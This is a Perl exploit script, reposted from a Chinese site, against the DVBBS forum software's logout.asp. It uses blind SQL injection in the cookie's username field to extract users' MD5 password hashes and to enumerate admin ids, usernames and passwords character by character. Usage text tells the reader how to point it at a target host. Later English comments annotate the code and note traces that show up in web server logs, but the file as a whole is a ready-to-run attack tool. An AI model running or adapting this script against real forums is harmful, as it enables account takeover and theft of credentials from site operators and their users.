
获取任意用户MD5加密信息的测试程序

--------------------[获取任意用户MD5加密信息的测试程序:  

#!/usr/bin/perl

#Codz By PsKey<PsKey@hotmail.com>

#Exploit of DVBBS's logout.asp

 

#--------------------------------------------------------------------------

#  本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户

#  MD5加密密码;另外可以自动破解后台管理员ID、username、password

#  脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序

#  脚本利用方法:

#  1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid

#  2:再另注册一任意用户(此步不可少)

#  3:运行脚本,按帮助输入命令参数

#  如果是MSSQL版,请把这段糟糕的脚本扔到一边

#--------------------------------------------------------------------------

 

$|=1;   # autoflush STDOUT so the progress dots printed below appear at once
use Socket;
use Getopt::Std;
# getopt() (not getopts): every listed switch takes a value. It sets the
# package globals $opt_h, $opt_p, $opt_w, $opt_i, $opt_u, $opt_m. The file
# runs without strict/warnings, so every variable below is a package global.
getopt('hpwium');

print "\n             ===================================================\n";
print "                       Exploit of DVBBS's logout.asp\n";
print "                     Codz By PsKey<PsKey\@hotmail.com>     \n";
print "                       http://www.isgrey.com/ && c4st.51.net              \n";
print "                       Thanx Envymask<130\@21cn.com>            \n";
print "             ===================================================\n";

# -h, -w, -i and -m are mandatory; -p gets a default below, -u is checked
# only by mode "p". usage() exits, so the rest of the script is not reached.
&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));

$host=$opt_h;        # read as a global by first(), second() and sendraw()
$port=$opt_p||80;    # "||" also turns an explicit "-p 0" into 80
$path=$opt_w;        # web path prefix prepended to every request, e.g. "/dvbbs"
$userid=$opt_i;      # id of the fixed test account; placed in the aspsky cookie
$user=$opt_u;        # target account name, used by mode "p" only
$mode=$opt_m;        # assigned but unused: the branches below test $opt_m directly

# Mode "p": recover the stored password field of the forum user named by -u,
# one character position at a time. Each probe is a boolean oracle: first()
# re-logs the fixed test account in, second() sends a logout.asp request
# carrying $target (a SQL fragment) in the cookie's username field, and the
# absence of the literal "ilikecat" in the index.asp page fetched afterwards
# is taken to mean the injected predicate held. The same three-request
# pattern repeats for every candidate character, which is what makes it
# conspicuous in web server logs.
if ($opt_m eq "p") {
&usage unless defined($opt_u);
print "\nPlease wait...\n\n";
# 16 positions over a hex alphabet, i.e. the stored value is treated as a
# 16-hex-character string (half the length of a full hex MD5 digest).
for ($j=1;$j<=16;$j++) {
@dic1=(0..9);
@dic2=(a..f);      # bareword range: the one-letter strings "a" .. "f"
@dic=(@dic1,@dic2);
&first;
for ($i=0;$i<@dic;$i++) {
print "$dic[$i]";
$key=$pws.$dic[$i];   # $pws holds the characters recovered so far (never reset here)
$target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";
&second;
# second() leaves the index.asp response lines in the global @in.
if ("@in" !~ /ilikecat/)  {
    $th=$j.th;      # "th" is a bareword string here (legal without strict)
    print "\n\/\/------------The $th word of the password is $dic[$i]";
    $pws=$pws.$dic[$i];
    last;
}
}
# NOTE(review): if no candidate matched for position $j the outer loop just
# continues, so $pws may be shorter than $j characters at this point.
}
print "\n\nSuccessful,the full password of $user is $pws.\n";
}

# Mode "b": enumerate the [admin] table with the same oracle. Four passes:
# ids, username lengths, usernames, then password fields. $i/$j/$k are
# reused package globals across all passes.
elsif ($opt_m eq "b") {

#Crack ID
# Pass 1: test ids 0..50 for existence; hits are collected in @id.
print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/)  {
    print "\n--------->>There is one admin's id $i";
    push (@id,$i);
    &first;   # re-establish the test session after every hit
}
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";
sleep(2);

#Crack the length of admin's username
# Pass 2: for each id in @id, find len(username) in 0..50; results go to
# @len and are indexed in parallel with @id by the later passes.
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";
for ($j=0;$j<@id;$j++) {
print "  \|\-\>cracking username's length which id is $id[$j] ...";
&first;
for ($i=0;$i<=50;$i++) {
$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";
&second;
if ("@in" !~ /ilikecat/)  {
    print "\n--------->>The length of $id[$j] is $i";
    push (@len,$i);
    &first;
    last;
}
}
# NOTE(review): nothing is pushed to @len when no length matched, so @len
# and @id can fall out of alignment from that id onwards.
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";
sleep(2);

#Crack admin's username
# Pass 3: recover each username over a 0-9a-z alphabet, up to $len[$j]
# characters, using left(username,$k)='$key'.
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";
@dic1=(0..9);
@dic2=(a..z);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";   # reset per id (unlike mode "p")
print "  \|\-\>cracking username which id is $id[$j] ...";
  OUTER: for ($k=1;$k<=$len[$j];$k++) {
  &first;
  USERNAME: for ($i=0;$i<@dic;$i++) {
  print "$dic[$i].";
  $key=$pws.$dic[$i];
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
    $th=$k.th;
    print "\n--------->>The $th word of $id[$j] username is $dic[$i]";
    $pws=$pws.$dic[$i];
    last USERNAME;
        }
  # Reached only when the last alphabet entry ("z") was also a miss: give
  # up on this id and record a "?" marker.
  if ($dic[$i] eq "z") {
    print "\ni can't crack this admin's name,maybe it is chinese.\n";
    push (@user,"\?");
    last OUTER;
        }
      }
    }
  # NOTE(review): executed after "last OUTER" as well, so a given-up id
  # contributes both "?" and its partial $pws to @user.
  push (@user,$pws);
  print "\n========>>The username is $pws which id is $id[$j]\n";
}
print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";
sleep(2);

#Crack admin's password
# Pass 4: same as mode "p" but against [admin].password, fixed 16 positions
# over a hex alphabet; results go to @pass.
print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";
@dic1=(0..9);
@dic2=(a..f);
@dic=(@dic1,@dic2);
for ($j=0;$j<@id;$j++) {
$pws="";
print "  \|\-\>cracking password which id is $id[$j] ...";
  for ($k=1;$k<=16;$k++) {
  &first;
  PASSWORD: for ($i=0;$i<@dic;$i++) {
  print "$dic[$i].";
  $key=$pws.$dic[$i];
  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";
  &second;
  if ("@in" !~ /ilikecat/)  {
    $th=$k.th;
    print "\n--------->>The $th word of $id[$j] password is $dic[$i]";
    $pws=$pws.$dic[$i];
    last PASSWORD;
        }
      }
    }
  push (@pass,$pws);
  print "\n\n========>>The password is $pws which id is $id[$j]\n\n";
}
print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";
print "We got them now:\n";
# ID, UserName, PassWord are barewords used as strings (no strict in effect).
printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);
# Rows are printed by position, so any drift between @id, @user and @pass
# noted above shows up here as mismatched rows.
for ($i=0;$i<@id;$i++) {
printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);
}
}

# Any other -m value: print help and exit.
else {
&usage;
}

 

sub first {
# Re-establishes the fixed test session before a probe: logs the hard-coded
# account "ilikecat"/"catlikeme" in through login.asp, then fetches index.asp
# with a cookie for that account. Reads globals $path, $host, $userid; writes
# globals $str, $len, $req, $req0. Both requests use bare "\n" line endings
# rather than CRLF. The literal account name, password and cookie layout are
# constant across every run, which makes them useful search terms when
# reviewing web server logs for this activity.
$str="username=ilikecat&password=catlikeme&CookieDate=1";
$len=length($str);
# A GET carrying a Content-Length and a body: the credentials appear both in
# the query string and in $str. This is the only HTTP/1.1 request in the
# file; all others are HTTP/1.0.
$req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
       "Referer: http://$host$path/login.asp\n".
       "Host: $host\n".
       "Content-Length: $len\n".
       "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".
       "\n".
       "$str\n\n";
print "\n.";
sendraw($req);
# Second request presents a fully populated aspsky cookie for the test user.
# The password field is a fixed 16-hex-character value (presumably the stored
# form of "catlikeme" — not verified here); the response is discarded.
$req0 = "GET $path/index.asp HTTP/1.0\n".
        "Referer: http://$host$path/index.asp\n".
        "Host: $host\n".
        "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
print ".\n";
sendraw($req0);
}

 

sub second {
# Issues one oracle probe. Reads globals $path, $host, $userid and $target
# (the caller's SQL fragment); writes globals $req1, $req2, @res and @in.
# Request 1: GET logout.asp with $target placed verbatim in the aspsky
# cookie's username field. Its response lines go to @res and are never
# examined. From a log-review standpoint this is the distinguishing artifact:
# a logout.asp request whose cookie username contains quotes, "%20" and SQL
# keywords.
$req1 = "GET $path/logout.asp HTTP/1.0\n".
        "Host: $host\n".
        "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
print ".";
@res = sendraw($req1);
# Request 2: GET index.asp?action=show with an empty cookie. Its response
# lines are left in @in for the caller, which tests them for "ilikecat".
# Note the trailing space in the Referer value.
$req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
        "Referer: http://$host$path/index.asp?action=show \n".
        "Host: $host\n".
        "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
print ".";
@in = sendraw($req2);
}

 

sub usage {
    # Prints the command-line help (interpolating $0, the script name) and
    # exits. Reached when a mandatory switch is missing or -m is neither
    # "b" nor "p".
    print <<"USAGE";


Usage: $0 -h <Host> [-p <port>] -w <path> -i <userid> -m <mode> [-u <user>]

    -h   =hostname you want to attack

    -p   =port,80 default

    -w   =the web path such as "/dvbbs"

    -i   =the userid of ilikecat

    -m   =only two choice,b<background> and p<proscenium>(This option need -u)

    -u   =the user you want to crack

Eg: 1.Crack proscenium

     $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m p -u admin 

    2.Crack background

     $0 -h http://www.target.com/ -p 80 -w /dvbbs -i 2 -m b

USAGE
    exit;
}

 

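sub sendraw {
    # Sends one pre-built raw HTTP request to the global $host:$port and
    # returns the response as a list of lines, read until the peer closes.
    #
    # $req   the complete request text (headers and body) as built by the
    #        caller; it is written verbatim, no line-ending fix-up is done.
    # Returns the response lines. Reads package globals $host and $port.
    # Dies with "inet_aton problems", "Socket problems" or "Can't connect..."
    # on the corresponding failure.
    my ($req) = @_;

    # inet_aton() expects a bare hostname or dotted quad, not a URL.
    my $addr = inet_aton($host) || die("inet_aton problems\n");

    # Protocol 0 is the kernel default for SOCK_STREAM; kept as the fallback
    # for a failed getprotobyname() lookup, as before.
    my $proto = getprotobyname('tcp') || 0;

    # Lexical handle instead of the bareword S, and sockaddr_in() instead of
    # the hand-packed "SnA4x8" address structure (which assumed AF_INET == 2).
    socket(my $sock, PF_INET, SOCK_STREAM, $proto) || die("Socket problems\n");
    unless (connect($sock, sockaddr_in($port, $addr))) {
        close($sock);   # previously the socket was leaked on a failed connect
        die("Can't connect...\n");
    }

    # Autoflush the socket so the whole request is on the wire before we
    # block on the read; restore whatever handle was selected rather than
    # assuming it was STDOUT.
    my $previous = select($sock);
    $| = 1;
    select($previous);

    print {$sock} $req;
    my @res = <$sock>;
    close($sock);
    return @res;
}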

(出处:http://www.13pc.com)

